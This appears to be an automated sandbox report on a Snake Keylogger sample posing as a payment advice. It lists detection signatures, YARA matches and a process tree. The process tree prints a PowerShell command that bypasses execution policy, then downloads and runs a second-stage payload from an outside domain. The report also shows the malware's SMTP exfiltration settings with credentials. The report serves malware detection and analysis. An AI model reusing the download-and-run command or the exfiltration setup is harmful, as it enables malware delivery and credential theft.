Edit tour

Windows Analysis Report
Payment_Advice.scr.exe

Overview

General Information

Sample name:	Payment_Advice.scr.exe
Analysis ID:	1434635
MD5:	49c97a3774c358b5fcbff920382a44f7
SHA1:	3714d51172cf0a3bbc6ab4ce2e7856cf4c26f30a
SHA256:	5f7f4ac493fd1b0840fcd25980ac12a86df921c8ec14e9de9c03ba29ab7ec1c5
Tags:	exe
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

Bypasses PowerShell execution policy

Drops PE files with a suspicious file extension

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Powershell drops PE file

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Invoke-WebRequest Execution

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Suspicious execution chain found

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Web Download

Sigma detected: SCR File Write Event

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Screensaver Binary File Creation

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Payment_Advice.scr.exe (PID: 2744 cmdline: "C:\Users\user\Desktop\Payment_Advice.scr.exe" MD5: 49C97A3774C358B5FCBFF920382A44F7)

Payment_Advice.scr.exe (PID: 3164 cmdline: "C:\Users\user\Desktop\Payment_Advice.scr.exe" MD5: 49C97A3774C358B5FCBFF920382A44F7)

wscript.exe (PID: 2720 cmdline: "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\4A6C.tmp\4A6D.tmp\4A6E.vbs //Nologo MD5: A47CBE969EA935BDD3AB568BB126BC80)

powershell.exe (PID: 3532 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Acrobat.exe (PID: 1096 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Payment_Advice.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)

AcroCEF.exe (PID: 6088 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

AcroCEF.exe (PID: 5280 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2064 --field-trial-handle=1724,i,3043175899489958109,16137333913944032320,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

hadvices.scr (PID: 8112 cmdline: "C:\Windows\Temp\hadvices.scr" /S MD5: 012DE24142F859797FBB5A25A7A3290D)

hadvices.scr (PID: 5648 cmdline: "C:\Windows\Temp\hadvices.scr" MD5: 012DE24142F859797FBB5A25A7A3290D)

svchost.exe (PID: 2792 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-usering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "test@qoldenfrontier.com", "Password": "%2WMoWREUv@3", "Host": "mail.qoldenfrontier.com", "Port": "587"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Payment_Advice.scr.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Windows\Temp\hadvices.scr	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000010.00000002.3360095396.0000000002D4C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000010.00000002.3355386659.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.3355386659.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000010.00000002.3355386659.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14857:$a1: get_encryptedPassword 0x14b4d:$a2: get_encryptedUsername 0x14663:$a3: get_timePasswordChanged 0x1475e:$a4: get_passwordField 0x1486d:$a5: set_encryptedPassword 0x15ebf:$a7: get_logins 0x15e22:$a10: KeyLoggerEventArgs 0x15abb:$a11: KeyLoggerEventArgsEventHandler
00000010.00000002.3355386659.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x181b8:$x1: $%SMTPDV$ 0x1821c:$x2: $#TheHashHere%& 0x19899:$x3: %FTPDV$ 0x1998d:$x4: $%TelegramDv$ 0x15abb:$x5: KeyLoggerEventArgs 0x15e22:$x5: KeyLoggerEventArgs 0x198bd:$m2: Clipboard Logs ID 0x19a89:$m2: Screenshot Logs ID 0x19b55:$m2: keystroke Logs ID 0x19a61:$m4: \SnakeKeylogger\
00000000.00000002.2102466582.00000000050E0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x3546d:$x1: In$J$ct0r
0000000F.00000002.2334857873.0000000003B26000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.2334857873.0000000003B26000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000F.00000002.2334857873.0000000003B26000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x56447:$a1: get_encryptedPassword 0x76e77:$a1: get_encryptedPassword 0x97697:$a1: get_encryptedPassword 0x5673d:$a2: get_encryptedUsername 0x7716d:$a2: get_encryptedUsername 0x9798d:$a2: get_encryptedUsername 0x56253:$a3: get_timePasswordChanged 0x76c83:$a3: get_timePasswordChanged 0x974a3:$a3: get_timePasswordChanged 0x5634e:$a4: get_passwordField 0x76d7e:$a4: get_passwordField 0x9759e:$a4: get_passwordField 0x5645d:$a5: set_encryptedPassword 0x76e8d:$a5: set_encryptedPassword 0x976ad:$a5: set_encryptedPassword 0x57aaf:$a7: get_logins 0x784df:$a7: get_logins 0x98cff:$a7: get_logins 0x57a12:$a10: KeyLoggerEventArgs 0x78442:$a10: KeyLoggerEventArgs 0x98c62:$a10: KeyLoggerEventArgs
0000000F.00000002.2334857873.0000000003B26000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x59da8:$x1: $%SMTPDV$ 0x7a7d8:$x1: $%SMTPDV$ 0x9aff8:$x1: $%SMTPDV$ 0x59e0c:$x2: $#TheHashHere%& 0x7a83c:$x2: $#TheHashHere%& 0x9b05c:$x2: $#TheHashHere%& 0x5b489:$x3: %FTPDV$ 0x7beb9:$x3: %FTPDV$ 0x9c6d9:$x3: %FTPDV$ 0x5b57d:$x4: $%TelegramDv$ 0x7bfad:$x4: $%TelegramDv$ 0x9c7cd:$x4: $%TelegramDv$ 0x576ab:$x5: KeyLoggerEventArgs 0x57a12:$x5: KeyLoggerEventArgs 0x780db:$x5: KeyLoggerEventArgs 0x78442:$x5: KeyLoggerEventArgs 0x988fb:$x5: KeyLoggerEventArgs 0x98c62:$x5: KeyLoggerEventArgs 0x5b4ad:$m2: Clipboard Logs ID 0x5b679:$m2: Screenshot Logs ID 0x5b745:$m2: keystroke Logs ID
00000010.00000002.3360095396.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: Payment_Advice.scr.exe PID: 2744	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: hadvices.scr PID: 8112	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: hadvices.scr PID: 8112	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: hadvices.scr PID: 8112	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: hadvices.scr PID: 8112	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5bc9:$a1: get_encryptedPassword 0x5eb5:$a2: get_encryptedUsername 0x59df:$a3: get_timePasswordChanged 0x5ada:$a4: get_passwordField 0x5bdf:$a5: set_encryptedPassword 0x801a:$a7: get_logins 0x7f7d:$a10: KeyLoggerEventArgs 0x7c16:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: hadvices.scr PID: 8112	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x7c16:$x5: KeyLoggerEventArgs 0x7f7d:$x5: KeyLoggerEventArgs 0x886b:$x5: KeyLoggerEventArgs 0x8b9f:$x5: KeyLoggerEventArgs 0xa1c0:$m2: Clipboard Logs ID 0xa2a0:$m2: Screenshot Logs ID 0xa2d4:$m2: keystroke Logs ID 0xa28c:$m4: \SnakeKeylogger\
Process Memory Space: hadvices.scr PID: 5648	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: hadvices.scr PID: 5648	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: hadvices.scr PID: 5648	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x161cd:$a1: get_encryptedPassword 0x164b9:$a2: get_encryptedUsername 0x15fe3:$a3: get_timePasswordChanged 0x160de:$a4: get_passwordField 0x161e3:$a5: set_encryptedPassword 0x1861e:$a7: get_logins 0x18581:$a10: KeyLoggerEventArgs 0x1821a:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: hadvices.scr PID: 5648	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1821a:$x5: KeyLoggerEventArgs 0x18581:$x5: KeyLoggerEventArgs 0x18e6f:$x5: KeyLoggerEventArgs 0x191a3:$x5: KeyLoggerEventArgs 0x1a7c4:$m2: Clipboard Logs ID 0x1a8a4:$m2: Screenshot Logs ID 0x1a8d8:$m2: keystroke Logs ID 0x1a890:$m4: \SnakeKeylogger\
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Payment_Advice.scr.exe.2ce1910.1.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x165dc:$x1: In$J$ct0r 0x182f0:$a1: WriteProcessMemory 0x1837c:$a1: WriteProcessMemory 0x18450:$a4: VirtualAllocEx 0x18674:$a4: VirtualAllocEx 0x186f4:$a4: VirtualAllocEx 0x1689c:$s3: net.pipe 0x168bc:$s4: vsmacros
15.2.hadvices.scr.3ad3d90.4.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x48e6b:$x1: In$J$ct0r
0.2.Payment_Advice.scr.exe.50e0000.4.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x3366d:$x1: In$J$ct0r
0.2.Payment_Advice.scr.exe.2ce1910.1.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x165dc:$x1: In$J$ct0r 0x182f0:$a1: WriteProcessMemory 0x1837c:$a1: WriteProcessMemory 0x18450:$a4: VirtualAllocEx 0x18674:$a4: VirtualAllocEx 0x186f4:$a4: VirtualAllocEx 0x1689c:$s3: net.pipe 0x168bc:$s4: vsmacros
0.2.Payment_Advice.scr.exe.3c2e590.3.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x3546d:$x1: In$J$ct0r
0.2.Payment_Advice.scr.exe.50e0000.4.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x3546d:$x1: In$J$ct0r
15.2.hadvices.scr.4fc0000.5.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x48e6b:$x1: In$J$ct0r
0.2.Payment_Advice.scr.exe.3c2e590.3.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x3366d:$x1: In$J$ct0r
15.2.hadvices.scr.3b679f0.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.hadvices.scr.3b679f0.3.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
15.2.hadvices.scr.3b679f0.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c57:$a1: get_encryptedPassword 0x12f4d:$a2: get_encryptedUsername 0x12a63:$a3: get_timePasswordChanged 0x12b5e:$a4: get_passwordField 0x12c6d:$a5: set_encryptedPassword 0x142bf:$a7: get_logins 0x14222:$a10: KeyLoggerEventArgs 0x13ebb:$a11: KeyLoggerEventArgsEventHandler
15.2.hadvices.scr.3b679f0.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a5e7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19819:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c4c:$a4: \Orbitum\User Data\Default\Login Data 0x1ac8b:$a5: \Kometa\User Data\Default\Login Data
15.2.hadvices.scr.3b679f0.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13835:$s1: UnHook 0x1383c:$s2: SetHook 0x13844:$s3: CallNextHook 0x13851:$s4: _hook
15.2.hadvices.scr.3b679f0.3.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x165b8:$x1: $%SMTPDV$ 0x1661c:$x2: $#TheHashHere%& 0x17c99:$x3: %FTPDV$ 0x17d8d:$x4: $%TelegramDv$ 0x13ebb:$x5: KeyLoggerEventArgs 0x14222:$x5: KeyLoggerEventArgs 0x17cbd:$m2: Clipboard Logs ID 0x17e89:$m2: Screenshot Logs ID 0x17f55:$m2: keystroke Logs ID 0x17e61:$m4: \SnakeKeylogger\
16.2.hadvices.scr.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.hadvices.scr.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
16.2.hadvices.scr.400000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
16.2.hadvices.scr.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a57:$a1: get_encryptedPassword 0x14d4d:$a2: get_encryptedUsername 0x14863:$a3: get_timePasswordChanged 0x1495e:$a4: get_passwordField 0x14a6d:$a5: set_encryptedPassword 0x160bf:$a7: get_logins 0x16022:$a10: KeyLoggerEventArgs 0x15cbb:$a11: KeyLoggerEventArgsEventHandler
16.2.hadvices.scr.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c3e7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b619:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ba4c:$a4: \Orbitum\User Data\Default\Login Data 0x1ca8b:$a5: \Kometa\User Data\Default\Login Data
16.2.hadvices.scr.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15635:$s1: UnHook 0x1563c:$s2: SetHook 0x15644:$s3: CallNextHook 0x15651:$s4: _hook
16.2.hadvices.scr.400000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x183b8:$x1: $%SMTPDV$ 0x1841c:$x2: $#TheHashHere%& 0x19a99:$x3: %FTPDV$ 0x19b8d:$x4: $%TelegramDv$ 0x15cbb:$x5: KeyLoggerEventArgs 0x16022:$x5: KeyLoggerEventArgs 0x19abd:$m2: Clipboard Logs ID 0x19c89:$m2: Screenshot Logs ID 0x19d55:$m2: keystroke Logs ID 0x19c61:$m4: \SnakeKeylogger\
15.0.hadvices.scr.5d0000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
15.2.hadvices.scr.3b88420.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.hadvices.scr.3b88420.2.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
15.2.hadvices.scr.3b88420.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c57:$a1: get_encryptedPassword 0x12f4d:$a2: get_encryptedUsername 0x12a63:$a3: get_timePasswordChanged 0x12b5e:$a4: get_passwordField 0x12c6d:$a5: set_encryptedPassword 0x142bf:$a7: get_logins 0x14222:$a10: KeyLoggerEventArgs 0x13ebb:$a11: KeyLoggerEventArgsEventHandler
15.2.hadvices.scr.3b88420.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a5e7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19819:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c4c:$a4: \Orbitum\User Data\Default\Login Data 0x1ac8b:$a5: \Kometa\User Data\Default\Login Data
15.2.hadvices.scr.3b88420.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13835:$s1: UnHook 0x1383c:$s2: SetHook 0x13844:$s3: CallNextHook 0x13851:$s4: _hook
15.2.hadvices.scr.3b88420.2.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x165b8:$x1: $%SMTPDV$ 0x1661c:$x2: $#TheHashHere%& 0x17c99:$x3: %FTPDV$ 0x17d8d:$x4: $%TelegramDv$ 0x13ebb:$x5: KeyLoggerEventArgs 0x14222:$x5: KeyLoggerEventArgs 0x17cbd:$m2: Clipboard Logs ID 0x17e89:$m2: Screenshot Logs ID 0x17f55:$m2: keystroke Logs ID 0x17e61:$m4: \SnakeKeylogger\
0.0.Payment_Advice.scr.exe.7b0000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
15.2.hadvices.scr.3b88420.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.hadvices.scr.3b88420.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
15.2.hadvices.scr.3b88420.2.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
15.2.hadvices.scr.3b88420.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a57:$a1: get_encryptedPassword 0x35277:$a1: get_encryptedPassword 0x14d4d:$a2: get_encryptedUsername 0x3556d:$a2: get_encryptedUsername 0x14863:$a3: get_timePasswordChanged 0x35083:$a3: get_timePasswordChanged 0x1495e:$a4: get_passwordField 0x3517e:$a4: get_passwordField 0x14a6d:$a5: set_encryptedPassword 0x3528d:$a5: set_encryptedPassword 0x160bf:$a7: get_logins 0x368df:$a7: get_logins 0x16022:$a10: KeyLoggerEventArgs 0x36842:$a10: KeyLoggerEventArgs 0x15cbb:$a11: KeyLoggerEventArgsEventHandler 0x364db:$a11: KeyLoggerEventArgsEventHandler
15.2.hadvices.scr.3b88420.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c3e7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cc07:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b619:$a3: \Google\Chrome\User Data\Default\Login Data 0x3be39:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ba4c:$a4: \Orbitum\User Data\Default\Login Data 0x3c26c:$a4: \Orbitum\User Data\Default\Login Data 0x1ca8b:$a5: \Kometa\User Data\Default\Login Data 0x3d2ab:$a5: \Kometa\User Data\Default\Login Data
15.2.hadvices.scr.3b88420.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15635:$s1: UnHook 0x35e55:$s1: UnHook 0x1563c:$s2: SetHook 0x35e5c:$s2: SetHook 0x15644:$s3: CallNextHook 0x35e64:$s3: CallNextHook 0x15651:$s4: _hook 0x35e71:$s4: _hook
15.2.hadvices.scr.3b88420.2.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x183b8:$x1: $%SMTPDV$ 0x38bd8:$x1: $%SMTPDV$ 0x1841c:$x2: $#TheHashHere%& 0x38c3c:$x2: $#TheHashHere%& 0x19a99:$x3: %FTPDV$ 0x3a2b9:$x3: %FTPDV$ 0x19b8d:$x4: $%TelegramDv$ 0x3a3ad:$x4: $%TelegramDv$ 0x15cbb:$x5: KeyLoggerEventArgs 0x16022:$x5: KeyLoggerEventArgs 0x364db:$x5: KeyLoggerEventArgs 0x36842:$x5: KeyLoggerEventArgs 0x19abd:$m2: Clipboard Logs ID 0x19c89:$m2: Screenshot Logs ID 0x19d55:$m2: keystroke Logs ID 0x3a2dd:$m2: Clipboard Logs ID 0x3a4a9:$m2: Screenshot Logs ID 0x3a575:$m2: keystroke Logs ID 0x19c61:$m4: \SnakeKeylogger\ 0x3a481:$m4: \SnakeKeylogger\
15.2.hadvices.scr.3b679f0.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.hadvices.scr.3b679f0.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
15.2.hadvices.scr.3b679f0.3.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
15.2.hadvices.scr.3b679f0.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a57:$a1: get_encryptedPassword 0x35487:$a1: get_encryptedPassword 0x55ca7:$a1: get_encryptedPassword 0x14d4d:$a2: get_encryptedUsername 0x3577d:$a2: get_encryptedUsername 0x55f9d:$a2: get_encryptedUsername 0x14863:$a3: get_timePasswordChanged 0x35293:$a3: get_timePasswordChanged 0x55ab3:$a3: get_timePasswordChanged 0x1495e:$a4: get_passwordField 0x3538e:$a4: get_passwordField 0x55bae:$a4: get_passwordField 0x14a6d:$a5: set_encryptedPassword 0x3549d:$a5: set_encryptedPassword 0x55cbd:$a5: set_encryptedPassword 0x160bf:$a7: get_logins 0x36aef:$a7: get_logins 0x5730f:$a7: get_logins 0x16022:$a10: KeyLoggerEventArgs 0x36a52:$a10: KeyLoggerEventArgs 0x57272:$a10: KeyLoggerEventArgs
15.2.hadvices.scr.3b679f0.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c3e7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ce17:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x5d637:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b619:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c049:$a3: \Google\Chrome\User Data\Default\Login Data 0x5c869:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ba4c:$a4: \Orbitum\User Data\Default\Login Data 0x3c47c:$a4: \Orbitum\User Data\Default\Login Data 0x5cc9c:$a4: \Orbitum\User Data\Default\Login Data 0x1ca8b:$a5: \Kometa\User Data\Default\Login Data 0x3d4bb:$a5: \Kometa\User Data\Default\Login Data 0x5dcdb:$a5: \Kometa\User Data\Default\Login Data
15.2.hadvices.scr.3b679f0.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15635:$s1: UnHook 0x36065:$s1: UnHook 0x56885:$s1: UnHook 0x1563c:$s2: SetHook 0x3606c:$s2: SetHook 0x5688c:$s2: SetHook 0x15644:$s3: CallNextHook 0x36074:$s3: CallNextHook 0x56894:$s3: CallNextHook 0x15651:$s4: _hook 0x36081:$s4: _hook 0x568a1:$s4: _hook
15.2.hadvices.scr.3b679f0.3.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x183b8:$x1: $%SMTPDV$ 0x38de8:$x1: $%SMTPDV$ 0x59608:$x1: $%SMTPDV$ 0x1841c:$x2: $#TheHashHere%& 0x38e4c:$x2: $#TheHashHere%& 0x5966c:$x2: $#TheHashHere%& 0x19a99:$x3: %FTPDV$ 0x3a4c9:$x3: %FTPDV$ 0x5ace9:$x3: %FTPDV$ 0x19b8d:$x4: $%TelegramDv$ 0x3a5bd:$x4: $%TelegramDv$ 0x5addd:$x4: $%TelegramDv$ 0x15cbb:$x5: KeyLoggerEventArgs 0x16022:$x5: KeyLoggerEventArgs 0x366eb:$x5: KeyLoggerEventArgs 0x36a52:$x5: KeyLoggerEventArgs 0x56f0b:$x5: KeyLoggerEventArgs 0x57272:$x5: KeyLoggerEventArgs 0x19abd:$m2: Clipboard Logs ID 0x19c89:$m2: Screenshot Logs ID 0x19d55:$m2: keystroke Logs ID
0.2.Payment_Advice.scr.exe.2c01dc8.0.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0xf6124:$x1: In$J$ct0r 0xf7e38:$a1: WriteProcessMemory 0xf7ec4:$a1: WriteProcessMemory 0xf7f98:$a4: VirtualAllocEx 0xf81bc:$a4: VirtualAllocEx 0xf823c:$a4: VirtualAllocEx 0xe4b4:$s3: net.pipe 0xf63e4:$s3: net.pipe 0xf6404:$s4: vsmacros
